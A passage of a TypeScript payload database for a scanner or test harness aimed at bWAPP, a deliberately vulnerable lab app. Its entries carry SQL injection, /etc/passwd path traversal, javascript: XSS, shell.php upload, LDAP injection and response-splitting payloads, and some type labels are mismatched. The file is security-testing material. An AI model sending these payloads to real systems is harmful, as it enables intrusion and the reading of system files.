    url: "/sqli_6.php?title=test'&action=search&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi numeric',
  },
  {
    id: 'bwapp-sqli-9',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: "/sqli_9.php?title=test'&action=search&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi',
  },
  {
    id: 'bwapp-sqli-13',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'numeric',
    method: 'GET',
    url: "/sqli_13.php?movie=test'&action=go&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi numeric movie',
  },
  {
    id: 'bwapp-sqli-15',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'POST',
    url: '/sqli_15.php',
    body: "title=test'&action=search&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi',
  },
  {
    id: 'bwapp-sqli-16',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'POST',
    url: '/sqli_16.php',
    body: "login=test'&password=test&form=submit&security_level=0",
    payload: "test'",
    expected: { contains: 'SQL' },
    verified: true,
    category: 'bWAPP SQLi POST login',
  },
  // 3. LFI / Directory Traversal
  {
    id: 'bwapp-lfi-local',
    target: 'bwapp',
    injectionType: 'lfi',
    closure: 'string',
    method: 'GET',
    url: '/rlfi.php?language=../../../../etc/passwd&action=go&security_level=0',
    payload: '../../../../etc/passwd',
    expected: { contains: 'root:x:0:0' },
    verified: true,
    category: 'bWAPP LFI',
  },
  {
    id: 'bwapp-dir-trav-1',
    target: 'bwapp',
    injectionType: 'lfi',
    closure: 'string',
    method: 'GET',
    url: '/directory_traversal_1.php?page=../../../../etc/passwd&security_level=0',
    payload: '../../../../etc/passwd',
    expected: { contains: 'root:x:0:0' },
    verified: true,
    category: 'bWAPP Directory Traversal',
  },
  // 4. Reflected XSS
  {
    id: 'bwapp-xss-reflected',
    target: 'bwapp',
    injectionType: 'xss_reflected',
    closure: 'string',
    method: 'GET',
    url: '/xss_referer.php?security_level=0',
    headers: { Referer: 'BWXSS_TEST' },
    payload: 'BWXSS_TEST (via Referer header)',
    expected: { contains: 'BWXSS_TEST' },
    verified: true,
    category: 'bWAPP XSS Referer (HTTP header injection)',
  },
  {
    id: 'bwapp-xss-ajax',
    target: 'bwapp',
    injectionType: 'xss_reflected',
    closure: 'string',
    method: 'GET',
    url: '/xss_ajax_2-1.php?title=BWXSS_AJAX&action=search&security_level=0',
    payload: 'BWXSS_AJAX',
    expected: { contains: 'BWXSS_AJAX' },
    verified: true,
    category: 'bWAPP XSS AJAX',
  },
  {
    id: 'bwapp-iframei',
    target: 'bwapp',
    injectionType: 'xss_reflected',
    closure: 'string',
    method: 'GET',
    url: "/iframei.php?url=javascript%3Aalert('BWXSS_IFRAME')&width=100&height=100&security_level=0",
    payload: "javascript:alert('BWXSS_IFRAME')",
    expected: { contains: 'javascript:alert' },
    verified: true,
    category: 'bWAPP iframe injection',
  },
  // 5. File Upload
  {
    id: 'bwapp-upload-unrestricted',
    target: 'bwapp',
    injectionType: 'file_upload',
    closure: 'none',
    method: 'POST',
    url: '/unrestricted_file_upload.php',
    body: 'form=submit&security_level=0',
    payload: 'shell.php (image/jpeg MIME bypass upload)',
    expected: { matches: /uploaded|success|\.php/i },
    verified: true,
    category: 'bWAPP Unrestricted Upload',
  },
  // 6. SSRF
  {
    id: 'bwapp-ssrf',
    target: 'bwapp',
    injectionType: 'ssrf',
    closure: 'string',
    method: 'POST',
    url: '/ssii.php',
    body: 'ip=127.0.0.1&form=submit&security_level=0',
    payload: '127.0.0.1',
    expected: { matches: /PING|packets|ttl=|time=/i },
    verified: true,
    category: 'bWAPP SSRF/IP injection',
  },
  // 7. Insecure Deserialization
  {
    id: 'bwapp-unserialize',
    target: 'bwapp',
    injectionType: 'csrf',
    closure: 'string',
    method: 'POST',
    url: '/unser.php',
    body: 'data=O:8:%22stdClass%22:0:{}&form=submit&security_level=0',
    payload: 'O:8:"stdClass":0:{}',
    expected: { statusCode: 200 },
    verified: true,
    category: 'bWAPP Unserialize',
  },
  // 8. Open Redirect
  {
    id: 'bwapp-redirect',
    target: 'bwapp',
    injectionType: 'csrf',
    closure: 'string',
    method: 'GET',
    url: '/smgmt_sessionid_url.php?url=http://127.0.0.1:8081/&security_level=0',
    payload: 'http://127.0.0.1:8081/',
    expected: { matches: /127\.0\.0\.1|Location/i },
    verified: true,
    category: 'bWAPP Open Redirect',
  },
  // 9. LDAP
  {
    id: 'bwapp-ldap',
    target: 'bwapp',
    injectionType: 'error_based_sqli',
    closure: 'string',
    method: 'GET',
    url: '/ldapi.php?user=*)(uid=*))(|(uid=*&pass=test&action=search&security_level=0',
    payload: '*)(uid=*))(|(uid=*',
    expected: { statusCode: 200 },
    verified: true,
    category: 'bWAPP LDAP injection',
  },
  // 10. PHP Code Injection (xss_eval style)
  {
    id: 'bwapp-xss-eval',
    target: 'bwapp',
    injectionType: 'rce',
    closure: 'string',
    method: 'POST',
    url: '/xss_eval.php',
    body: "eval=BW_EVAL_TEST&form=submit&security_level=0",
    payload: 'BW_EVAL_TEST',
    expected: { contains: 'BW_EVAL_TEST' },
    verified: true,
    category: 'bWAPP xss_eval',
  },
  // 11. PHP Info
  {
    id: 'bwapp-phpi',
    target: 'bwapp',
    injectionType: 'rce',
    closure: 'string',
    method: 'GET',
    url: '/phpi.php?movie=1&action=go&security_level=0',
    payload: '1',
    expected: { matches: /PHP Version|phpinfo/i },
    verified: true,
    category: 'bWAPP PHP Info',
  },
  // 12. HTTP Response Splitting
  {
    id: 'bwapp-hrs',
    target: 'bwapp',
    injectionType: 'csrf',
    closure: 'string',
    method: 'GET',
    url: '/http_response_splitting.php?lang=en%0d%0aSet-Cookie:%20test=hacked&security_level=0',
    payload: 'en\r\nSet-Cookie: test=hacked',
    expected: { statusCode: 200 },
    verified: true,
    category: 'bWAPP HTTP Response Splitting',
  },
  // 13. HPP (HTTP Parameter Pollution)
  {
    id: 'bwapp-hpp',
    target: 'bwapp',
    injectionType: 'waf_bypass',
    closure: 'string',
    method: 'GET',
    url: '/hpp-2.php?title=BW_HPP&title=POLLUTED&action=search&security_level=0',
    payload: 'BW_HPP & POLLUTED',
    expected: { matches: /BW_HPP|POLLUTED/i },
    verified: true,
    category: 'bWAPP HPP',
  },
];

export function getPayloadsByType(type: InjectionType): PayloadEntry[] {
  return PAYLOAD_DATABASE.filter((p) => p.injectionType === type);
}

export function getPayloadsByTarget(target: string): PayloadEntry[] {
  return PAYLOAD_DATABASE.filter((p) => p.target === target);
}

export function getPayloadsByClosure(closure: ClosureType): PayloadEntry[] {
  return PAYLOAD_DATABASE.filter((p) => p.closure === closure);
}

export function getPayloadStats(): Record<string, number> {
  const stats: Record<string, number> = {};
  for (const p of PAYLOAD_DATABASE) {
    stats[p.injectionType] = (stats[p.injectionType] || 0) + 1;
  }
  return stats;
}
